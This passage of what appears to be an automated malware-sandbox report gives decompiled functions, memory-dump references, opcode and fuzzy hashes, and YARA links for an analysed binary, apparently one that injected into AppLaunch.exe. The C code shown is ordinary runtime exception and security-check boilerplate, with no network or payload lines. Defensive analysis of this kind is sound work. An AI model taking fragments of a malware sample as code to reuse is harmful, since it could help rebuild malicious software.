                                                                                                                                    • Opcode ID: 95936b5808607d16dc7a1ba5c372cfe942ff5375e4f892cf06993119343bf576
                                                                                                                                    • Instruction ID: c82e71e833ef9415276d3f2d1d83ec1d59cc7ce8b32f43807622730dea307cf6
                                                                                                                                    • Opcode Fuzzy Hash: 95936b5808607d16dc7a1ba5c372cfe942ff5375e4f892cf06993119343bf576
                                                                                                                                    • Instruction Fuzzy Hash: 8F31267A218101DFC24ECA34DD508EB7BA6DFC9260B58CA2FE0478A1A8C7349683C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCD4D, Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: 309a3e9c36eaa984f0aee2ecead180cda2661b45b76eb6cb734a53c4d1ecdb18
                                                                                                                                    • Instruction ID: f0af606cc2c0f7182a5225d4554c76fb733a7b34d6da59c8b6bc6f9bd3c6290b
                                                                                                                                    • Opcode Fuzzy Hash: 309a3e9c36eaa984f0aee2ecead180cda2661b45b76eb6cb734a53c4d1ecdb18
                                                                                                                                    • Instruction Fuzzy Hash: AC31337A618101DFC24ECA34DD508EB7BA6EFC9370B54CA2FE0468A1A8C7349683C785
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCD5C, Relevance: 3.9, Strings: 3, Instructions: 109COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: 7f6e274fc9af4a0245a799d7490cfbc94cce4f9f8e71c7e4395337ea7613819f
                                                                                                                                    • Instruction ID: 79acf914b47d69907d303118a538251236aed6e16eb64d6e9f0d986326cabb9a
                                                                                                                                    • Opcode Fuzzy Hash: 7f6e274fc9af4a0245a799d7490cfbc94cce4f9f8e71c7e4395337ea7613819f
                                                                                                                                    • Instruction Fuzzy Hash: 2B31367A61C101DFD24DCA34DD509EB7BA6DFC9270B54CB2FE0468A1A8C7349687C789
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 026BCD6C, Relevance: 3.9, Strings: 3, Instructions: 103COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000003.653688407.00000000026BC000.00000004.00000001.sdmp, Offset: 026BC000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_3_26bc000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "R@$|mE$>D
                                                                                                                                    • API String ID: 0-1509467082
                                                                                                                                    • Opcode ID: bf7667b10e07e3f4a985fe0fe7d4a7028790cc1c7fedc11c04460aebac6ff16f
                                                                                                                                    • Instruction ID: 057b8a031932dc906b9ab34da7f4c101af3eafd98ce0c264b27c3f331a740eb5
                                                                                                                                    • Opcode Fuzzy Hash: bf7667b10e07e3f4a985fe0fe7d4a7028790cc1c7fedc11c04460aebac6ff16f
                                                                                                                                    • Instruction Fuzzy Hash: 7131467B618101DFD24EC924DD409EB7B96DFC9260B54CA2FE0468A2A8D7349683C7C9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00409380, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 52%
                                                                                                                                    			E00409380(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr* _t75;
				intOrPtr _t76;
				signed int _t79;
				char _t81;
				intOrPtr _t84;
				intOrPtr _t91;
				intOrPtr _t94;
				intOrPtr* _t96;
				void* _t97;
				void* _t100;
				void* _t102;
				void* _t109;

				_t87 = __edx;
				_t75 = _a4;
				_v5 = 0;
				_v16 = 1;
				0x422262( *_t75, __edi, __esi, __ebx, _t97);
				 *_t75 = __eax;
				_t76 = _a8;
				_t6 = _t76 + 0x10; // 0x11
				_t94 = _t6;
				_push(_t94);
				_v20 = _t94;
				_v12 =  *(_t76 + 8) ^  *0x43302c;
				E00409340(_t76, __edx, __edi, _t94,  *(_t76 + 8) ^  *0x43302c);
				E0040A40C(_a12);
				_t52 = _a4;
				_t102 = _t100 - 0x1c + 0x10;
				_t91 =  *((intOrPtr*)(_t76 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t91 - 0xfffffffe;
					if(_t91 != 0xfffffffe) {
						_t87 = 0xfffffffe;
						E0040A590(_t76, 0xfffffffe, _t94, 0x43302c);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t76 - 4)) =  &_v32;
					if(_t91 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t79 = _v12;
							_t59 = _t91 + (_t91 + 2) * 2;
							_t76 =  *((intOrPtr*)(_t79 + _t59 * 4));
							_t60 = _t79 + _t59 * 4;
							_t80 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t81 = _v5;
								goto L7;
							} else {
								_t87 = _t94;
								_t61 = E0040A530(_t80, _t94);
								_t81 = 1;
								_v5 = 1;
								_t109 = _t61;
								if(_t109 < 0) {
									_v16 = 0;
									L13:
									_push(_t94);
									E00409340(_t76, _t87, _t91, _t94, _v12);
									goto L14;
								} else {
									if(_t109 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x425b3c;
											if( *0x425b3c != 0) {
												0x421b30(0x425b3c);
												_t102 = _t102 + 4;
												__eflags = _t62;
												if(_t62 != 0) {
													_t96 =  *0x425b3c; // 0x4076d6
													 *0x424150(_a4, 1);
													 *_t96();
													_t94 = _v20;
													_t102 = _t102 + 8;
												}
												_t62 = _a4;
											}
										}
										_t88 = _t62;
										E0040A570(_a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t91;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t91) {
											_t88 = _t91;
											E0040A590(_t64, _t91, _t94, 0x43302c);
											_t64 = _a8;
										}
										_push(_t94);
										 *((intOrPtr*)(_t64 + 0xc)) = _t76;
										E00409340(_t76, _t88, _t91, _t94, _v12);
										_t84 =  *((intOrPtr*)(_v24 + 8));
										E0040A550();
										asm("int3");
										__eflags = E0040A5A7();
										if(__eflags != 0) {
											_t67 = E00409643(_t84, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E0040A5E3();
												goto L23;
											}
										} else {
											L23:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L27;
							L7:
							_t91 = _t76;
						} while (_t76 != 0xfffffffe);
						if(_t81 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L27:
			}





























                                                                                                                                    0x00409380
                                                                                                                                    0x00409387
                                                                                                                                    0x0040938c
                                                                                                                                    0x00409392
                                                                                                                                    0x00409399
                                                                                                                                    0x0040939e
                                                                                                                                    0x004093a0
                                                                                                                                    0x004093a6
                                                                                                                                    0x004093a6
                                                                                                                                    0x004093af
                                                                                                                                    0x004093b1
                                                                                                                                    0x004093b4
                                                                                                                                    0x004093b7
                                                                                                                                    0x004093bf
                                                                                                                                    0x004093c4
                                                                                                                                    0x004093c7
                                                                                                                                    0x004093ca
                                                                                                                                    0x004093d1
                                                                                                                                    0x0040942d
                                                                                                                                    0x00409430
                                                                                                                                    0x00409438
                                                                                                                                    0x0040943f
                                                                                                                                    0x00000000
                                                                                                                                    0x0040943f
                                                                                                                                    0x00000000
                                                                                                                                    0x004093d3
                                                                                                                                    0x004093d3
                                                                                                                                    0x004093d9
                                                                                                                                    0x004093df
                                                                                                                                    0x004093e5
                                                                                                                                    0x00409450
                                                                                                                                    0x00409459
                                                                                                                                    0x004093e7
                                                                                                                                    0x004093e7
                                                                                                                                    0x004093e7
                                                                                                                                    0x004093ed
                                                                                                                                    0x004093f0
                                                                                                                                    0x004093f3
                                                                                                                                    0x004093f6
                                                                                                                                    0x004093f9
                                                                                                                                    0x004093fe
                                                                                                                                    0x00409414
                                                                                                                                    0x00000000
                                                                                                                                    0x00409400
                                                                                                                                    0x00409400
                                                                                                                                    0x00409402
                                                                                                                                    0x00409407
                                                                                                                                    0x00409409
                                                                                                                                    0x0040940c
                                                                                                                                    0x0040940e
                                                                                                                                    0x00409424
                                                                                                                                    0x00409444
                                                                                                                                    0x00409444
                                                                                                                                    0x00409448
                                                                                                                                    0x00000000
                                                                                                                                    0x00409410
                                                                                                                                    0x00409410
                                                                                                                                    0x0040945a
                                                                                                                                    0x0040945d
                                                                                                                                    0x00409463
                                                                                                                                    0x00409465
                                                                                                                                    0x0040946c
                                                                                                                                    0x00409473
                                                                                                                                    0x00409478
                                                                                                                                    0x0040947b
                                                                                                                                    0x0040947d
                                                                                                                                    0x0040947f
                                                                                                                                    0x0040948c
                                                                                                                                    0x00409492
                                                                                                                                    0x00409494
                                                                                                                                    0x00409497
                                                                                                                                    0x00409497
                                                                                                                                    0x0040949a
                                                                                                                                    0x0040949a
                                                                                                                                    0x0040946c
                                                                                                                                    0x004094a0
                                                                                                                                    0x004094a2
                                                                                                                                    0x004094a7
                                                                                                                                    0x004094aa
                                                                                                                                    0x004094ad
                                                                                                                                    0x004094b5
                                                                                                                                    0x004094b9
                                                                                                                                    0x004094be
                                                                                                                                    0x004094be
                                                                                                                                    0x004094c1
                                                                                                                                    0x004094c5
                                                                                                                                    0x004094c8
                                                                                                                                    0x004094d5
                                                                                                                                    0x004094d8
                                                                                                                                    0x004094dd
                                                                                                                                    0x004094e3
                                                                                                                                    0x004094e5
                                                                                                                                    0x004094ea
                                                                                                                                    0x004094ef
                                                                                                                                    0x004094f1
                                                                                                                                    0x004094fc
                                                                                                                                    0x004094f3
                                                                                                                                    0x004094f3
                                                                                                                                    0x00000000
                                                                                                                                    0x004094f3
                                                                                                                                    0x004094e7
                                                                                                                                    0x004094e7
                                                                                                                                    0x004094e7
                                                                                                                                    0x004094e9
                                                                                                                                    0x004094e9
                                                                                                                                    0x00409412
                                                                                                                                    0x00000000
                                                                                                                                    0x00409412
                                                                                                                                    0x00409410
                                                                                                                                    0x0040940e
                                                                                                                                    0x00000000
                                                                                                                                    0x00409417
                                                                                                                                    0x00409417
                                                                                                                                    0x00409419
                                                                                                                                    0x00409420
                                                                                                                                    0x00000000
                                                                                                                                    0x00409422
                                                                                                                                    0x00000000
                                                                                                                                    0x00409420
                                                                                                                                    0x004093e5
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004093B7
                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 004093BF
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00409448
                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00409473
                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 004094C8
                                                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004094DE
                                                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004094F3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.656666063.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.656656322.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.656808686.0000000000424000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.656823280.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.656835786.0000000000435000.00000020.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.657471400.00000000005BA000.00000040.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.658566651.00000000008DB000.00000080.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.658598865.00000000008F5000.00000040.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
                                                                                                                                    • String ID: csm
                                                                                                                                    • API String ID: 1385549066-1018135373
                                                                                                                                    • Opcode ID: b54af191e5277065f4b42db484dda9ea3e36e052006e6a613692d7bc91471fd8
                                                                                                                                    • Instruction ID: af19b8e953b52b1ad6c49d3d25afbd0b7752f12186d2ec4d53f47732675c9bb8
                                                                                                                                    • Opcode Fuzzy Hash: b54af191e5277065f4b42db484dda9ea3e36e052006e6a613692d7bc91471fd8
                                                                                                                                    • Instruction Fuzzy Hash: 1441A434A04215ABCF10DF69C840A9E7BA1BF45318F14807BE8147B3D3D739AE16CB99
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00406E5F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E00406E5F(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t10;
				intOrPtr _t15;
				signed int _t16;
				signed int _t18;
				signed int _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				intOrPtr* _t33;
				void* _t36;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				_t36 = _t24 -  *0x43302c; // 0xcba2a1a8
				if(_t36 != 0) {
					_t31 = _t33;
					_t10 = IsProcessorFeaturePresent(0x17);
					if(_t10 != 0) {
						_t24 = 2;
						asm("int 0x29");
					}
					 *0x434330 = _t10;
					 *0x43432c = _t24;
					 *0x434328 = _t27;
					 *0x434324 = _t23;
					 *0x434320 = _t29;
					 *0x43431c = _t28;
					 *0x434348 = ss;
					 *0x43433c = cs;
					 *0x434318 = ds;
					 *0x434314 = es;
					 *0x434310 = fs;
					 *0x43430c = gs;
					asm("pushfd");
					_pop( *0x434340);
					 *0x434334 =  *_t31;
					 *0x434338 = _v0;
					 *0x434344 =  &_a4;
					 *0x434280 = 0x10001;
					_t15 =  *0x434338; // 0x0
					 *0x43423c = _t15;
					 *0x434230 = 0xc0000409;
					 *0x434234 = 1;
					 *0x434240 = 1;
					_t16 = 4;
					 *((intOrPtr*)(0x434244 + _t16 * 0)) = 2;
					_t18 = 4;
					_t25 =  *0x43302c; // 0xcba2a1a8
					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
					_t20 = 4;
					_t26 =  *0x433028; // 0x345d5e57
					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
					return E004074B7("0BC");
				} else {
					return __eax;
				}
			}




















                                                                                                                                    0x00406e5f
                                                                                                                                    0x00406e5f
                                                                                                                                    0x00406e5f
                                                                                                                                    0x00406e5f
                                                                                                                                    0x00406e5f
                                                                                                                                    0x00406e5f
                                                                                                                                    0x00406e65
                                                                                                                                    0x004074e0
                                                                                                                                    0x004074ea
                                                                                                                                    0x004074f2
                                                                                                                                    0x004074f6
                                                                                                                                    0x004074f7
                                                                                                                                    0x004074f7
                                                                                                                                    0x004074f9
                                                                                                                                    0x004074fe
                                                                                                                                    0x00407504
                                                                                                                                    0x0040750a
                                                                                                                                    0x00407510
                                                                                                                                    0x00407516
                                                                                                                                    0x0040751c
                                                                                                                                    0x00407523
                                                                                                                                    0x0040752a
                                                                                                                                    0x00407531
                                                                                                                                    0x00407538
                                                                                                                                    0x0040753f
                                                                                                                                    0x00407546
                                                                                                                                    0x00407547
                                                                                                                                    0x00407550
                                                                                                                                    0x00407558
                                                                                                                                    0x00407560
                                                                                                                                    0x0040756b
                                                                                                                                    0x00407575
                                                                                                                                    0x0040757a
                                                                                                                                    0x0040757f
                                                                                                                                    0x00407589
                                                                                                                                    0x00407593
                                                                                                                                    0x0040759f
                                                                                                                                    0x004075a3
                                                                                                                                    0x004075af
                                                                                                                                    0x004075b3
                                                                                                                                    0x004075b9
                                                                                                                                    0x004075bf
                                                                                                                                    0x004075c3
                                                                                                                                    0x004075c9
                                                                                                                                    0x004075d8
                                                                                                                                    0x00406e67
                                                                                                                                    0x00406e67
                                                                                                                                    0x00406e67

                                                                                                                                    APIs
                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004074EA
                                                                                                                                    • ___raise_securityfailure.LIBCMT ref: 004075D2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.656666063.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.656656322.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.656808686.0000000000424000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.656823280.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.656835786.0000000000435000.00000020.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.657471400.00000000005BA000.00000040.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.658566651.00000000008DB000.00000080.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.658598865.00000000008F5000.00000040.00020000.sdmp Download File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                    • String ID: 0BC
                                                                                                                                    • API String ID: 3761405300-4138729775
                                                                                                                                    • Opcode ID: 4d56b74f51e44b0a393fb4d1222f85c6e42904c8f96811c6ada06069d37ed91f
                                                                                                                                    • Instruction ID: 5283cd047c040878c9149d0fe1a5efdd53019919ce43ad5fba9561057b0d443b
                                                                                                                                    • Opcode Fuzzy Hash: 4d56b74f51e44b0a393fb4d1222f85c6e42904c8f96811c6ada06069d37ed91f
                                                                                                                                    • Instruction Fuzzy Hash: 3D21EFB8A00300DAD314DF65F8856C53BF4FB88750F60A07AE9099B3A0E3B4B9808F4D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Analysis Process: AppLaunch.exe PID: 5180 Parent PID: 6220 AppLaunch.exeCOMMON

                                                                                                                                    Executed Functions

                                                                                                                                    Function 0564EC28, Relevance: .4, Instructions: 382COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 18286e6ae5a284b218e2f63d5a1ed559fcca4d67a457f37716efdd22a340c1f0
                                                                                                                                    • Instruction ID: 1b258e067bf2692d8e41870c2b38accd3a19adbbdfa9e801b7145245df5d11d0
                                                                                                                                    • Opcode Fuzzy Hash: 18286e6ae5a284b218e2f63d5a1ed559fcca4d67a457f37716efdd22a340c1f0
                                                                                                                                    • Instruction Fuzzy Hash: 21D1C334B002159FCB14DBB9C454A6EBBF7BF89204B158469D606DB7A1DF35DC02CBA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056484D8, Relevance: 2.0, Instructions: 1975COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 61dd066eb1b8a4fd45b5cad54019a467729398d42241aa6c5b5a02046c8d6640
                                                                                                                                    • Instruction ID: 61f5035b144229e7130ab8dc93ec517b178fb5b6ecdfdfb548e9dd61d639b715
                                                                                                                                    • Opcode Fuzzy Hash: 61dd066eb1b8a4fd45b5cad54019a467729398d42241aa6c5b5a02046c8d6640
                                                                                                                                    • Instruction Fuzzy Hash: 5713F034A11208EFCB169F70D651ADDB772FF9930AB1184AE9C1127B508B7FA546EF02
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056484E8, Relevance: 2.0, Instructions: 1973COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 53ede28733308d15b23dae65cdd3be0d5e580175c718972299aa221693043b54
                                                                                                                                    • Instruction ID: 8653a0ad84a8cba3427c775ff7bc9071fdc4d6578677c3dcf9f4e69dc1e00d4d
                                                                                                                                    • Opcode Fuzzy Hash: 53ede28733308d15b23dae65cdd3be0d5e580175c718972299aa221693043b54
                                                                                                                                    • Instruction Fuzzy Hash: A413F034A11208EFCB169F70D651ADDB372FF9930AB1184AE9C1127B548B7FA546EF02
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056404C8, Relevance: 1.6, Strings: 1, Instructions: 377COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: xl
                                                                                                                                    • API String ID: 0-3116759922
                                                                                                                                    • Opcode ID: 28b3d96ae661a8ac64cf210730e67e0c8b5bd0eb8917a5073f2cb3bba72bf718
                                                                                                                                    • Instruction ID: 1fdc337e9a0a67a2178ee835291ad5ba19b214c53c69c8248b999194dcc6e5f2
                                                                                                                                    • Opcode Fuzzy Hash: 28b3d96ae661a8ac64cf210730e67e0c8b5bd0eb8917a5073f2cb3bba72bf718
                                                                                                                                    • Instruction Fuzzy Hash: FBE18D36A10225EFCB069FA0C904EAD7BB6FF48310F0545A8E20A9F671DB32D955DF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564E398, Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ,~lk
                                                                                                                                    • API String ID: 0-2263291579
                                                                                                                                    • Opcode ID: d5f32d96f1543e8072ecf90a98e5c8f82ac46f8d47df20a75e88a7c0b21c096c
                                                                                                                                    • Instruction ID: e45f5c7bb637b6b32fbb0a2e2505fcc76cb664de67f5b37ae19c645aa80c1fe9
                                                                                                                                    • Opcode Fuzzy Hash: d5f32d96f1543e8072ecf90a98e5c8f82ac46f8d47df20a75e88a7c0b21c096c
                                                                                                                                    • Instruction Fuzzy Hash: 62E12734A00209DFCB14DF65D498AAEBBB6FF88310F158928E9169B760DB71EC45CF91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 056404BB, Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: xl
                                                                                                                                    • API String ID: 0-3116759922
                                                                                                                                    • Opcode ID: e4164bbfd599292917063695e251234642f61cf8de9cd96178e7b25bf659d4e3
                                                                                                                                    • Instruction ID: 9447c6e4ef1d796cb979b2df2d1077ba4e5f5839536c6f241c573fb3f7c2044f
                                                                                                                                    • Opcode Fuzzy Hash: e4164bbfd599292917063695e251234642f61cf8de9cd96178e7b25bf659d4e3
                                                                                                                                    • Instruction Fuzzy Hash: 91D18D36A10225EFCF169FA0C904EA97BB6FF48310F0641A8E60A9F671DB32D955DF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0564F088, Relevance: .4, Instructions: 421COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3a5dd516e9a920ac687975ef12561c541a41542bf5d05c8a6f852f58d040b7c4
                                                                                                                                    • Instruction ID: 0cc9419aa0bdb4cc2d87aec358dff6f4ed518f901ffca66fc692101c6eb8cfe4
                                                                                                                                    • Opcode Fuzzy Hash: 3a5dd516e9a920ac687975ef12561c541a41542bf5d05c8a6f852f58d040b7c4
                                                                                                                                    • Instruction Fuzzy Hash: 8CE1AD75B002058FC714DF78C8A8A6AB7F6EF89204F1144A9E906CB7A2DB35DC46CF51
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05645BA8, Relevance: .2, Instructions: 203COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.733697679.0000000005640000.00000040.00000001.sdmp, Offset: 05640000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_5640000_AppLaunch.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a198a6365bdd38c7bad26c056b3a4b4c549b08565af555f8e7d0f1de79bd9222
                                                                                                                                    • Instruction ID: 6d41f9f913cb82251bb62aeda155b98c6557fe12a037f85f9e102d2c312436ff
                                                                                                                                    • Opcode Fuzzy Hash: a198a6365bdd38c7bad26c056b3a4b4c549b08565af555f8e7d0f1de79bd9222
                                                                                                                                    • Instruction Fuzzy Hash: C861C076B010198FCB25ABB8D46497E37B7EBD52117618029D506CB784DF389C43CFA2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

